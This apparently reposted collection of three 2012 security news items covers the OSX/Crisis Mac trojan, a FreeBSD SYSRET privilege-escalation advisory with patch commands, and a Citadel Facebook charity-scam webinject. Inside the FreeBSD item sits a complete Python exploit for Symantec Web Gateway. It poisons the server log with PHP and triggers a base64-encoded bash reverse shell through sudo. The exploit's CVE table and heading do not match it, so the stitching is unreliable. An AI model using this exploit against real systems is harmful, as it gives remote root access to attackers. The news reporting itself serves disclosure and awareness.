New Mac Trojan installs silently, no password required Summary: A new Mac OS X Trojan referred to as OSX/Crisis silently infects OS X 10.6 Snow Leopard and OS X 10.7 Lion. The threat was created in a way that is intended to make reverse engineering more difficult, an added extra that is more common with Windows malware than it is with Mac malware. By Emil Protalinski for Zero Day | July 24, 2012 -- 23:00 GMT (16:00 PDT) A new Mac OS X Trojan has been discovered that drops different components depending on whether or not it is executed on a user account with Admin permissions. The threat installs itself silently (no user interaction required) and also does not need your user password to infect your Apple Mac. The backdoor component calls home to the IP address 176.58.100.37 every five minutes, awaiting instructions. Intego, which had to update its anti-malware signatures upon discovering the threat, refers to it as "OSX/Crisis." The good news is that the security firm has yet to find OSX/Crisis in the wild; the company only stumbled upon it over at VirusTotal, a service for analyzing suspicious files and URLs. This Trojan is like most: when run, it installs silently to create a backdoor. What makes this threat particularly worrying is that depending on whether or not it runs on a user account with Admin permissions, it will install different components, which use low-level system calls to hide their activities. Either way, it will always create a number of files and folders to complete its tasks. If the dropper runs on a system with Admin permissions, it will drop a rootkit to hide itself. The malware creates 17 files when it's run with Admin permissions, 14 files when it's run without. Many of these are randomly named, but there are some that are consistent. With or without Admin permissions, this folder is created: /Library/ScriptingAdditions/appleHID/ Only with Admin permissions, this folder is created: /System/Library/Frameworks/Foundation.framework/XPCServices/ Here's where it gets interesting. "The file is created in a way that is intended to make reverse engineering tools more difficult to use when analyzing the file," an Intego spokesperson said in a statement. "This sort of anti-analysis technique is common in Windows malware, but is relatively uncommon for OS X malware." Curiously, this particular malware only affects OS X 10.6 Snow Leopard and OS X 10.7 Lion. The latest threat further underlines the importance of protecting Macs against malware with an updated antivirus program as well as the latest security updates. That means you should start by geting OS X 10.8 Mountain Lion when it comes out Wednesday (although it's currently unclear whether OSX/Crisis or Mac security software will work on it). Sursa: New Mac Trojan installs silently, no password required | ZDNet

CVE-2012-0217 - Intel SYSRET FreeBSD Privilege Escalation Exploit Released | The Hacker News [table=width: 500, class: grid] [tr] [td]EDB-ID: 20064[/td] [td]CVE: 2012-2957 [/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: muts [/td] [td]Published: 2012-07-24[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: [/td] [td][/td] [/tr] [/table] #!/usr/bin/python ''' The original patch for the Symantec Web Gateway 5.0.2 LFI vulnerability removed the /tmp/networkScript file but left the entry in /etc/sudoers, allowing us to simply recreate the file and obtain a root shell using a different LFI vulnerability. Timeline: # 06 Jun 2012: Vulnerability reported to CERT # 08 Jun 2012: Response received from CERT with disclosure date set to 20 Jul 2012 # 26 Jun 2012: Email received from Symantec for additional information # 26 Jun 2012: Additional proofs of concept sent to Symantec # 06 Jul 2012: Update received from Symantec with intent to fix # 20 Jul 2012: Symantec patch released: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00 # 23 Jul 2012: Public Disclosure ''' import socket import sys import base64 print "[*] #########################################################" print "[*] Symantec Web Gateway 5.0.3.18 LFI Remote ROOT RCE Exploit" print "[*] Offensive Security - http://www.offensive-security.com" print "[*] #########################################################\n" if (len(sys.argv) != 4): print "[*] Usage: symantec-web-gateway-0day.py <RHOST> <LHOST> <LPORT>" exit(0) rhost = str(sys.argv[1]) lhost = sys.argv[2] lport = sys.argv[3] # Base64 encoded bash reverse shell # Payload does sudo-fu abuse of sudoable /tmp/networkScript with apache:apache permissions payload= '''echo '#!/bin/bash' > /tmp/networkScript; echo 'bash -i >& /dev/tcp/'''+lhost+'/' + lport payload+=''' 0>&1' >> /tmp/networkScript;chmod 755 /tmp/networkScript; sudo /tmp/networkScript''' payloadencoded=base64.encodestring(payload).replace("\n","") taint="GET /<?php shell_exec(base64_decode('%s'));?> HTTP/1.1\r\n\r\n" % payloadencoded trigger="GET /spywall/languageTest.php?&language=../../../../../../../../usr/local/apache2/logs/access_log%00 HTTP/1.0\r\n\r\n" print "[*] Super Sudo Backdoor injection, w00t" expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect((rhost, 80)) expl.send(taint) expl.close() print "[*] Triggering Payload ...3,2,1 " expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect((rhost, 80)) expl.send(trigger) expl.close() print "[*] Can you haz shell on %s %s ?\n" % (lhost,lport)

CVE-2012-0217 - Intel SYSRET FreeBSD Privilege Escalation Exploit Released Posted On 7/25/2012 09:06:00 AM By THN Security Analyst he Vulnerability reported on 06/12/2012, dubbed as "CVE-2012-0217" - according to that Some 64-bit operating systems and virtualization software running on Intel CPU hardware are vulnerable to a local privilege escalation attack. The vulnerability may be exploited for local privilege escalation or a guest-to-host virtual machine escape. FreeBSD/amd64 runs on CPUs from different vendors. Due to varying behaviour of CPUs in 64 bit mode a sanity check of the kernel may be insufficient when returning from a system call. Successful exploitation of the problem can lead to local kernel privilege escalation, kernel data corruption and/or crash. Inj3ct0r team today released related private exploit on their website, which allow normal FreeBSD users to Privilege Escalation. All systems running 64 bit Xen hypervisor running 64 bit PV guests onIntel CPUs are vulnerable to this issue. However FreeBSD/amd64 running on AMD CPUs is not vulnerable to thisparticular problem.Systems with 64 bit capable CPUs, but running the 32 bit FreeBSD/i386kernel are not vulnerable, nor are systems running on differentprocessor architectures. Download the relevant patch from the location below: # fetch http://security.FreeBSD.org/patches/SA-12:04/sysret.patch # fetch http://security.FreeBSD.org/patches/SA-12:04/sysret.patch.asc # fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81.patch # fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81.patch.asc [8.1 if original sysret.patch has been applied] # fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81-correction.patch # fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81-correction.patch.asc How to Apply the patch ? # cd /usr/src # patch < /path/to/patch After Recompile your kernel as described and reboot the system and update system # freebsd-update fetch # freebsd-update install Sursa: CVE-2012-0217 - Intel SYSRET FreeBSD Privilege Escalation Exploit Released | The Hacker News

Facebook virus warning: Massive children charity scam Summary: Cybercriminals have developed a custom piece of malware that injects itself into your Facebook session and prompts you to donate to a charity for sick children. The scammers' goal is to make off with your personal data, especially your credit card number. By Emil Protalinski for Zero Day | July 24, 2012 -- 20:19 GMT (13:19 PDT) Security researchers have discovered a new variant of the Citadel malware that injects itself into your Facebook webpages and demands that you make a donation to a fake charity for sick children. Please be warned: there are no children charities that will ask you for a donation via Facebook. There are, however, individuals very interested in stealing your credit card number and other personal information. Once your computer is infected with the malware, it quickly adds itself into your Facebook session, as you can see above. After you log into your Facebook account, the Citadel injection mechanism displays a pop up that encourages you to donate $1 to children who "desperately" need humanitarian aid. Next, it asks you for your name, credit card number, expiration date, CVV, and security password. What makes this attack particularly sophisticated is that the malware is configured to use different scam text depending on your country and language, according to Trusteer. The scammers use domains such as hopeforthepoorchildren.org, fundcauses.com, lwbspain.blogspot.ca, and childfund.de to push the scam in at least five different languages: English, Italian, Spanish, German, and Dutch. The English version of attack asks you to make a $1 donation for Haitian children living in poverty. Here's the text in question (please note that the scammers can change the scam's wording as they please): You can save a life with only $1. When you give to HPC, 99% of every dollar "cash plus gifts-in-kind" goes directly to programs that serve the poorest child in Haiti. We work currently with two orphanages and elementary school, we are seeking donations. Please donate and help us spread the word to your friends, families, etc. Click to donate to make a difference! All you give, they'll be much appreciated. We appreciate your interest and hope that you will open your hearts and donate to better the lives and futures of those in need. If you have any questions before you donate please do not hesitate to contact us. We treat personal information with the utmost respect for your privacy. Click the button above. Thank you. The Italian version exploits the Red Balloon campaign that was created to fight child mortality in Italy. The criminals claim that the campaign has already collected more than 1 million euros for sick children and point out that more than 7 million children die from basic illnesses each year. Here's the text in question (again, the scammers can change the scam's wording as they please): Gonfia un palloncino rosso e salva la vita di un bambino con Save the Children! NOTA: Il palloncino rosso di Save the Children, simbolo della lotta alla mortalità infantile non si è mai fermato e con la campagna Every One sono stati già raccolti più di un milione di euro. Ogni anno, nel mondo, più di 7 milioni di bambini muoiono per cause facilmente curabili: continua a sostenere i progetti di Save the Children per salvarli! Trusteer found that the Spanish version had a bug in the injection code which defaults to the English version of the text. The fraudsters' intention was to exploit a well-known Spanish nutrition program for infants and children, which collects donations as well as purchases, and then sends pictures of the children to donors. A bit of searching on Google leads me to believe that this is the Spanish text that you're supposed to see: Estos pequeños, puestos en fila para la foto, son parte de nuestro programa de nutrición en Jiangmen, Provincia de Guangdong. El programa empezó en el 2011 cuando un padre adoptante llamó nuestra atención sobre las necesidad de estos niños de tener leche enriquecida. Nuestro programa es tan pequeño como nuevo, pero servimos a unos 10 bebés y niños. Mandamos un cargamento de leche trimestralmente y recibimos nuevas fotos de los niños a cambio. Con el aumento del precio de la leche, se ha vuelto mas y mas duro mantener los biberones llenos! Puedes marcar la diferencia en la vida de un niño con una donación mensual de 20 euros, o con una donación puntual de cualquier cantidad. Los donantes recibirán fotos y actualizaciones trimestrales. The German version urges you to make a donation to ChildFund. Here's the text in question (the scammers can change the scam's wording as they please): Einmalig oder regelmäßig – jeder Beitrag hilft. Mit jedem noch so kleinen Betrag unterstützen Sie unser gemeinsames Anliegen, hilfsbedürftigen Kindern und ihren Familien eine Zukunft zu schenken, die sie ohne unsere Hilfe nicht hätten. Ihre Spende dauert nur wenige Minuten und zahlt sich für Kinder in Not um ein Vielfaches aus. Helfen Sie mit! Spenden Sie Hoffnung. Weil jeder Tag zählt! Für Ihr Engagement bedanken wir uns schon jetzt sehr herzlich. The Dutch version asks you for a donation to Save the Children. The following text was not reposted anywhere online, leading me to believe that this one has already been changed by the cybercriminals to something else: Save the Children zet zich al 90 jaar in om kinderlevens te redden, hun dromen te verwezelijken en hun toekomst een kans te geven. We redden kinderlevens, vechten voor hun rechten en helpen kinderen groeien. Zo redden we de dromen en de toekomst van kinderen. Steun ons eenmalig 1 eur This attack is a massive undertaking. The cybercriminals behind this scam are likely very well organized and have been pushing very hard to spread it on Facebook. If you've discovered that you are affected by this attack, use an antivirus program (such as Microsoft Security Essentials) to clean your system before using the social network again. "This attack illustrates the continuing customization of financial malware and harvesting of credit card data from the global base of Facebook users. Using children’s charities as a scam makes this attack believable and effective," a Trusteer spokesperson said in a statement. "Meanwhile, the one dollar donation amount is low enough that virtually anyone can contribute if they choose. This is a well-designed method for stealing credit and debit card data on a massive scale." As a general word of caution, don't hand over any of your credentials via Facebook unless you are absolutely certain that it's coming from the social network. If you want to warn Facebook about this scam, feel free to contact Facebook Security. Sursa: Facebook virus warning: Massive children charity scam | ZDNet